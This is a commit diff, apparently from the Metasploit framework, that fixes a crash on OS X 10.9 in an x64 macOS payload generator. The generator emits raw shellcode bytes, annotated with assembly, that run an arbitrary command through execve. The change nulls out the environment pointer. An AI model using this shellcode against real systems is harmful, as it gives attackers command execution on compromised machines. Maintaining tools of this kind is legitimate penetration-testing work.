NULL out envp pointer before execve call.

joevennix · joevennix · commit 6a02a2e3b35a · 2014-03-03T08:56:52.000-06:00
This was causing a crash on 10.9.
diff --git a/modules/payloads/singles/osx/x64/exec.rb b/modules/payloads/singles/osx/x64/exec.rb
@@ -36,21 +36,21 @@ def generate
     arg_str = cmd_parts.map { |a| "#{a}\x00" }.join
     call = "\xe8" + [arg_str.length].pack('V')
     payload =
-      "\x48\x31\xc0" +                                # xor rax, rax
+      "\x48\x31\xd2"+                                 # xor rdx, rdx
       call +                                          # call CMD.len
       arg_str  +                                      # CMD
       "\x5f" +                                        # pop rdi
       if cmd_parts.length > 1
         "\x48\x89\xf9" +                            # mov rcx, rdi
-        "\x50" +                                    # push null
+        "\x52" +                                    # push rdx (null)
         # for each arg, push its current memory location on to the stack
         cmd_parts[1..-1].each_with_index.map do |arg, idx|
           "\x48\x81\xc1" +                        # add rcx + ...
           [cmd_parts[idx].length+1].pack('V') +   #
           "\x51"                                  # push rcx (build str array)
         end.join
       else
-        "\x50"                                      # push null
+        "\x52"                                      # push rdx (null)
       end +
       "\x57"+                                         # push rdi
       "\x48\x89\xe6"+	                                # mov rsi, rsp
